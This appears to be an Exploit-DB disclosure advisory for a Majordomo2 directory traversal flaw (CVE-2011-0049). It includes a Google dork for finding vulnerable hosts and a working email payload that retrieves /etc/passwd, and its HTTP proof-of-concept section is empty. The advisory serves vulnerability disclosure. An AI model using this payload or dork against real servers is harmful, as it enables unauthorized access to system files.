Majordomo2 - Directory Traversal (SMTP/HTTP)

EDB-ID: 16103 CVE: 2011-0049... OSVDB-ID: 70762...
Verified: Author: Michael Brooks Published: 2011-02-03
Download Exploit: Source Raw Download Vulnerable App:
Original Advisory:
Credit: Michael Brooks (
Vulnerability:  Directory Traversal
Software: Majordomo2
Affected Build: 20110121 and prior
Google dork:inurl:mj_wwwusr

Special thanks to Dave Miller,  Reed Loden and the rest of the Mozilla
security team for handling the issue.

This vulnerability is exploitable via ALL of Majordomo2's interfaces.
e-mail*.  Send an email to majordomo's mail interface (for example: with the body of the message as follows:
help ../../../../../../../../../../../../../etc/passwd

I'll give you one guess as to the contents of the response email ;).

PoC for HTTP: